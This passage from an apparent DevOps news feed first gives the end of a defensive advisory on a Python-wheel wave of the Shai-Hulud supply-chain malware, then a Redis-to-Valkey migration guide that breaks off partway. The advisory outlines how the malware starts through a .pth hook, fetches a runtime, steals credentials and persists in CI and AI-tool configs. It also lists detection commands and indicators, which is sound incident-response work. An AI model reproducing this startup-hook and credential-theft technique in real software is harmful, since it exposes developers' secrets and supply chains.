        <a href="#h3-what-is-new-this-time" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What is new this time
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-is-new-this-time"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Compared with earlier Shai-Hulud waves, three things stand out:</p>
<ul>
<li><strong>Python-native trigger.</strong> A <code>.pth</code> startup hook replaces the npm <code>preinstall</code> script. It runs earlier and on a broader set of processes.</li>
<li><strong>Hades theming.</strong> The previous Miasma wave used Zelda references. This one uses underworld names like <code>stygian</code>, <code>cerberus</code>, and <code>thanatos</code>, with the <code>Hades - The End for the Damned</code> exfil marker.</li>
<li><strong>Toolchain persistence.</strong> Recovered artifacts reach into developer tooling: a <code>gh-token-monitor</code> daemon with systemd or LaunchAgent persistence, <code>.claude/setup.mjs</code> and <code>.github/setup.js</code> hooks, an injected <code>.github/workflows/codeql.yml</code>, and <code>~/.local/share/updater/update.py</code>.</li>
</ul>
<h2 id="h2-are-you-exposed-what-to-check" class="group relative scroll-mt-24">
        <a href="#h2-are-you-exposed-what-to-check" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Are you exposed? What to check
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-are-you-exposed-what-to-check"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>First, check whether any affected package is installed:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># List installed packages and match against the compromised set</span>
pip list --format=freeze 2&gt;/dev/null | grep -iE \
  <span class="hljs-string">&#x27;^(bramin|cmd2func|coolbox|dynamo-release|executor-engine|executor-http|funcdesc|magique|magique-ai|mrbios|napari-ufish|nucbox|okite|pantheon-agents|pantheon-toolsets|spateo-release|synago|ufish|uprobe)=&#x27;</span>
</code></pre><p>Then scan the host for the runtime indicators the loader leaves behind:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Sentinel file and the dropped Bun runtime</span>
<span class="hljs-built_in">ls</span> -la <span class="hljs-string">&quot;<span class="hljs-variable">${TMPDIR:-/tmp}</span>/.bun_ran&quot;</span> /tmp/b.zip /tmp/b/bun 2&gt;/dev/null

<span class="hljs-comment"># The JavaScript payload and the startup hook inside site-packages</span>
find <span class="hljs-string">&quot;<span class="hljs-subst">$(python -c &#x27;import site; print(site.getsitepackages()</span>[0])&#x27; 2&gt;/dev/null)&quot;</span> \
  -name <span class="hljs-string">&#x27;_index.js&#x27;</span> -o -name <span class="hljs-string">&#x27;*-setup.pth&#x27;</span> 2&gt;/dev/null

<span class="hljs-comment"># Any .pth file that executes an import line (the startup trick)</span>
grep -rEl <span class="hljs-string">&#x27;^import &#x27;</span> $(python -c <span class="hljs-string">&#x27;import site; print(&quot; &quot;.join(site.getsitepackages()))&#x27;</span> 2&gt;/dev/null) 2&gt;/dev/null
</code></pre><p>If you have a GitHub organization, audit it for the exfiltration markers:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Public repos created with the Hades description</span>
gh search repos <span class="hljs-string">&#x27;Hades - The End for the Damned&#x27;</span> --json fullName,createdAt

<span class="hljs-comment"># Commits carrying the campaign marker across your org</span>
gh search commits <span class="hljs-string">&#x27;IfYouYankThisTokenItWillNukeTheComputerOfTheOwnerFully&#x27;</span> --json repository

<span class="hljs-comment"># Suspicious workflow and artifact names in your repos</span>
<span class="hljs-comment"># (look for a workflow called &quot;Run Copilot&quot; and artifacts named &quot;format-results&quot;)</span>
</code></pre><p>Watch your logs for a <code>python</code> process spawning a <code>bun</code> binary, outbound requests to <code>github.com/oven-sh/bun/releases/download/</code>, and writes to <code>/tmp/b.zip</code> or <code>/tmp/b/bun</code>.</p>
<h2 id="h2-if-you-were-hit-respond-in-this-order" class="group relative scroll-mt-24">
        <a href="#h2-if-you-were-hit-respond-in-this-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you were hit: respond in this order
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-if-you-were-hit-respond-in-this-order"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Assume any secret reachable from the affected host or runner is burned. Rotate in priority order, highest blast radius first.</p>
<ol>
<li><strong>GitHub.</strong> Personal access tokens, GitHub App tokens, Actions secrets, and deploy keys. Revoke, do not just rotate, anything the runner could read.</li>
<li><strong>Package publishing.</strong> PyPI, npm, RubyGems, JFrog, and CircleCI tokens. Re-issue with 2FA and scoped permissions.</li>
<li><strong>Cloud and orchestration.</strong> AWS, GCP, Azure, Kubernetes service-account tokens, and Vault tokens. Review CloudTrail or the equivalent for use during the exposure window.</li>
<li><strong>Keys and local config.</strong> SSH keys, Docker credentials, Git credential helpers, and cloud CLI profiles.</li>
<li><strong>AI and developer tools.</strong> Anthropic and Claude or MCP tokens, and anything stored in editor or agent configs.</li>
</ol>
<p>Then clean the environment:</p>
<ul>
<li>Remove the malicious releases and pin to a known-good version, or remove the package entirely</li>
<li>Rebuild the affected machine or container from a clean image rather than deleting files in place</li>
<li>Delete the persistence artifacts: <code>gh-token-monitor</code>, <code>.claude/setup.mjs</code>, <code>.github/setup.js</code>, the injected <code>codeql.yml</code>, and <code>~/.local/share/updater/update.py</code></li>
<li>Remove any attacker-created public repos and the <code>format-results</code> artifacts from your org</li>
</ul>
<h2 id="h2-how-to-prevent-the-next-one" class="group relative scroll-mt-24">
        <a href="#h2-how-to-prevent-the-next-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to prevent the next one
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-to-prevent-the-next-one"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The mechanism changes each wave, but the defenses are stable:</p>
<ul>
<li><strong>Pin and verify.</strong> Use a lockfile with hashes (<code>pip install --require-hashes</code>, <code>uv.lock</code>, or <code>poetry.lock</code>). Hash pinning stops a surprise patch release from sliding in.</li>
<li><strong>Scan for the pattern, not the name.</strong> A new wave will use new package names. Flag wheels that ship an executable <code>.pth</code> line, download a runtime or binary, write executables to temp directories, or hand off to a JavaScript payload.</li>
<li><strong>Isolate installs.</strong> Run <code>pip install</code> for untrusted or first-time dependencies in a sandbox or ephemeral container with no ambient credentials. CI runners should use short-lived, scoped tokens, not long-lived org secrets.</li>
<li><strong>Lock down runners.</strong> Tools like StepSecurity harden-runner that egress-filter CI are worth it precisely because this malware checks for them and the payload tries to avoid them.</li>
<li><strong>Audit the AI toolchain.</strong> Treat Claude, MCP, IDE, and workflow configs as part of your attack surface now. These campaigns have moved past package hooks into developer tooling, and a poisoned <code>.github/workflows/</code> file or agent config persists long after the package is gone.</li>
</ul>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The Hades wave is a reminder that &quot;I only use Python&quot; is not a safe place to stand. Shai-Hulud now ships Python wheels that execute at interpreter startup through a <code>.pth</code> hook, pull down their own runtime, and drain whatever credentials a developer or CI machine can see.</p>
<p>The mental model to keep:</p>
<ul>
<li>Installation is execution. A <code>pip install</code> of a poisoned wheel can run code on the next <code>python</code> start, with no import.</li>
<li>The target is your secrets, especially CI/CD and GitHub tokens, so a hit on one runner can become a hit on your whole supply chain.</li>
<li>The fix order is rotate, rebuild, and pin, in that order, and then make the next wave easier to catch with hash pinning and isolated installs.</li>
</ul>
<p>Check your environment with the commands above, rotate anything that was exposed, and pin your dependencies so the next mass patch release cannot walk straight in.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Is Valkey Ready to Replace Redis in 2026?]]></title>
      <link>https://devops-daily.com/posts/is-valkey-ready-to-replace-redis-2026</link>
      <description><![CDATA[Valkey forked from Redis after the 2024 license change and has matured fast. Here is whether it is production-ready, how the migration works, and whether the AGPL question even applies to you.]]></description>
      <pubDate>Fri, 05 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/is-valkey-ready-to-replace-redis-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Valkey]]></category><category><![CDATA[Redis]]></category><category><![CDATA[Caching]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[Migration]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>If you run Redis in production, the last two years gave you a question you did not ask for: stay on Redis, or move to Valkey? In 2024 the answer was &quot;wait and see.&quot; The fork was new, the feature gap was tiny, and nobody wanted to re-point their cache layer at a project with no track record.</p>
<p>In 2026 the picture is clear enough to act on. Valkey is on its 9.1 release, it is the default in-memory store on AWS ElastiCache, and it has its own performance roadmap. Redis, for its part, went back to an open-source license with Redis 8 and pulled the old Redis Stack modules into the core engine. This is no longer a simple fork-versus-original story.</p>
<p>This post answers the practical question directly. Is Valkey ready for production, where do the two projects actually differ now, does the AGPL license that Redis adopted affect you, and how does the migration work if you decide to move? For a side-by-side feature table, pricing, and a decision matrix, see our companion <a href="/comparisons/valkey-vs-redis">Valkey vs Redis comparison</a>.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Valkey is production-ready in 2026. It is wire-compatible with Redis, governed by the Linux Foundation, on a steady release cadence (9.1 in May 2026), and is the default on AWS ElastiCache and MemoryDB.</li>
<li>Redis is open source again under AGPLv3 since Redis 8, so &quot;Redis is no longer open source&quot; is out of date. The catch is that AGPL is copyleft, while Valkey stays on permissive BSD.</li>
<li>The AGPL question only bites if you modify the Redis source and offer it to others over a network. If you just use Redis as a cache or database, it changes almost nothing.</li>
<li>Migration from Redis 7.2.x is close to a drop-in: same protocol, same RDB and AOF files, and an in-place upgrade path on ElastiCache.</li>
<li>The real divergence is features added after the fork. Redis 8 bundles JSON, search, time series, and vector sets into core. Valkey ships those as separate modules.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A running Redis instance (self-hosted or managed) and access to its configuration</li>
<li>The ability to take and restore an RDB snapshot, or to run a replica</li>
<li>A staging environment where you can test before touching production</li>
<li>Familiarity with <code>redis-cli</code> and your client library&#39;s connection settings</li>
</ul>
<h2 id="h2-how-we-got-here-the-license-timeline" class="group relative scroll-mt-24">
        <a href="#h2-how-we-got-here-the-license-timeline" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How we got here: the license timeline
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-we-got-here-the-license-timeline"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The decision makes more sense once you have the sequence straight.</p>
<pre><code class="hljs language-text">2009-2024   Redis ships under the permissive BSD license
Mar 2024    Redis Inc. relicenses to SSPLv1 + RSALv2 (source-available, not OSI open source)
Mar 2024    Linux Foundation forks Redis 7.2.4 as Valkey (BSD), backed by AWS, Google, Oracle, Snap
2024-2025   Valkey ships 8.0 and 8.1 with multi-threaded I/O and big throughput gains
May 2025    Redis 8 adds AGPLv3 as a third license; Redis Open Source is OSI open source again
2026        Valkey 9.1 (May) and Redis 8.2 (Feb) both shipping; both fast, both open source
</code></pre><p>Two things matter in that timeline. First, Valkey never carried the source-available license. It forked from the last BSD release, so its license has been permissive the whole time. Second, Redis did not stay source-available. Redis 8 added the OSI-approved AGPLv3, which means Redis is open source again, just under a copyleft license instead of the old permissive one.</p>
<h2 id="h2-is-valkey-actually-production-ready" class="group relative scroll-mt-24">
        <a href="#h2-is-valkey-actually-production-ready" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Is Valkey actually production-ready?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-is-valkey-actually-production-ready"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Yes, and the evidence is not subtle.</p>
<p><strong>Releases and stability.</strong> Valkey shipped 8.0 and 8.1 through 2024 and 2025, then 9.0 and 9.1 in 2026. The 8.1 line is still maintained (8.1.8 landed in June 2026), so you get the same kind of long-lived release branches you expect from mature infrastructure software.</p>
<p><strong>Performance.</strong> Valkey put most of its early effort into multi-core throughput. Valkey 9 added pipeline memory prefetching, zero-copy responses, and SIMD optimizations for commands like <code>BITCOUNT</code>. Valkey 9.1 reports around 2.1 million requests per second on 512-byte payloads. Redis 8 also added large gains, so both are fast; Valkey tends to pull ahead on many cores.</p>
<p><strong>Cloud adoption.</strong> This is the strongest signal. AWS made Valkey the default for new ElastiCache and MemoryDB clusters and prices it below Redis OSS, roughly 20% lower on ElastiCache and about 30% lower on MemoryDB. Google Cloud offers Memorystore for Valkey, and Oracle supports it on OCI Cache. When the major clouds make a fork their default, the &quot;will it survive&quot; question is settled.</p>
<p><strong>Governance.</strong> Valkey sits under the Linux Foundation with a multi-company steering model. No single vendor can relicense it, which is the exact failure mode that started this whole story.</p>
<h2 id="h2-where-valkey-and-redis-diverge-now" class="group relative scroll-mt-24">
        <a href="#h2-where-valkey-and-redis-diverge-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where Valkey and Redis diverge now
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-valkey-and-redis-diverge-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Up to Redis 7.2.4 the two are the same code. After the fork they drew apart, and that is where your decision lives.</p>
<p>The biggest difference is the built-in feature set. Redis 8 folded the former Redis Stack into the core engine, so JSON, the Query Engine, time series, probabilistic types, and vector sets all ship in the box. Vector sets in particular, built by the original Redis creator, make Redis a strong default for AI and semantic-search features.</p>
<p>Valkey keeps the core lean and ships those capabilities as separate modules, such as <code>valkey-search</code> and <code>valkey-json</code>. You get similar functionality, but you assemble it rather than getting it bundled. If your workload is a plain cache, a session store, a rate limiter, or a queue, this difference does not touch you. If you want vector search inside the data store with no extra setup, Redis 8 is ahead today.</p>
<p>For the full side-by-side across licensing, performance, modules, and managed-service cost, the <a href="/comparisons/valkey-vs-redis">Valkey vs Redis comparison</a> lays it out in a table.</p>
<h2 id="h2-the-agpl-question-does-it-actually-affect-you" class="group relative scroll-mt-24">
        <a href="#h2-the-agpl-question-does-it-actually-affect-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The AGPL question: does it actually affect you?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-agpl-question-does-it-actually-affect-you"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the part that gets the most confused commentary, so be precise about it.</p>
<p>AGPLv3 is a copyleft license with a network clause. The obligation it adds, on top of the GPL, is this: if you modify the software and let users interact with it over a network, you have to make your modified source available to those users. That is the whole of it.</p>
<p>Walk it through your own setup:</p>
<pre><code class="hljs language-text">Do you modify the Redis source code?
        |
        +-- No --&gt; AGPL changes nothing for you. Use Redis 8 freely.
        |
        Yes
        |
Do you offer that modified Redis to others over a network
(for example, as part of a hosted product)?
        |
        +-- No (internal use only) --&gt; No source-disclosure obligation in practice.
        |
        +-- Yes --&gt; You may have to publish your modifications. This is the
                    case where teams choose Valkey&#x27;s BSD license instead.
</code></pre><p>For the large majority of teams, the honest answer is that AGPL does not affect them. You pull the official image, run it as a cache or database, and never touch the source. Nothing is triggered. The teams that genuinely care are the ones building a product on top of a modified engine, especially anyone offering a hosted data-store service. For them, Valkey&#39;s permissive BSD license removes the question entirely, which is exactly why several vendors standardized on Valkey.</p>
<h2 id="h2-migrating-from-redis-to-valkey" class="group relative scroll-mt-24">
        <a href="#h2-migrating-from-redis-to-valkey" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Migrating from Redis to Valkey
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-migrating-from-redis-to-valkey"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the good news that makes the decision low-risk: for Redis 7.2.x and earlier, moving to Valkey is close to a drop-in. The two speak the same RESP protocol and read the same on-disk formats.</p>
<h3 id="h3-step-1-confirm-your-version-and-features" class="group relative scroll-mt-24">
        <a href="#h3-step-1-confirm-your-version-and-features" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: confirm your version and features
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-1-confirm-your-version-and-features"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Check what you are running and whether you use any Redis 8 core modules.</p>
<pre><code class="hljs language-bash">redis-cli INFO server | grep redis_version
<span class="hljs-comment"># redis_version:7.2.5</span>

<span class="hljs-comment"># If you use modules, list them. Valkey core will not have Redis 8 modules.</span>
redis-cli MODULE LIST
</code></pre><p>If <code>MODULE LIST</code> is empty and you are on 7.2.x, you are in the easy path. If you depend on Redis Query Engine, JSON, or vector sets, plan to add the matching Valkey modules or keep those workloads on Redis.</p>
<h3 id="h3-step-2-back-up-your-data" class="group relative scroll-mt-24">
        <a href="#h3-step-2-back-up-your-data" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: back up your data
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-2-back-up-your-data"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Take an RDB snapshot before anything else.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Trigger a snapshot and copy the file off the box</span>
redis-cli SAVE
<span class="hljs-built_in">cp</span> /var/lib/redis/dump.rdb /backup/dump.rdb.$(<span class="hljs-built_in">date</span> +%F)
</code></pre><h3 id="h3-step-3-stand-up-valkey-and-load-the-snapshot" class="group relative scroll-mt-24">
        <a href="#h3-step-3-stand-up-valkey-and-load-the-snapshot" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: stand up Valkey and load the snapshot
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-3-stand-up-valkey-and-load-the-snapshot"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Valkey reads the same <code>dump.rdb</code>, so you can point a fresh Valkey instance at it.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Run Valkey 9.1 in a container, mounting the existing RDB</span>
docker run -d --name valkey \
  -p 6379:6379 \
  -v /backup:/data \
  valkey/valkey:9.1 valkey-server --<span class="hljs-built_in">dir</span> /data --dbfilename dump.rdb.2026-06-05

<span class="hljs-comment"># Verify it came up and loaded your keys</span>
valkey-cli DBSIZE
</code></pre><p>The CLI is <code>valkey-cli</code>, but <code>redis-cli</code> works against Valkey too, since the protocol is identical.</p>
<h3 id="h3-step-4-cut-over-clients" class="group relative scroll-mt-24">
        <a href="#h3-step-4-cut-over-clients" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: cut over clients
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-4-cut-over-clients"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>You do not need a new client library. Point your existing Redis client at the Valkey endpoint. The connection settings and commands are the same.</p>
<pre><code class="hljs language-text"># Before
REDIS_URL=redis://redis.internal:6379

# After (same scheme, same port, new host)
REDIS_URL=redis://valkey.internal:6379
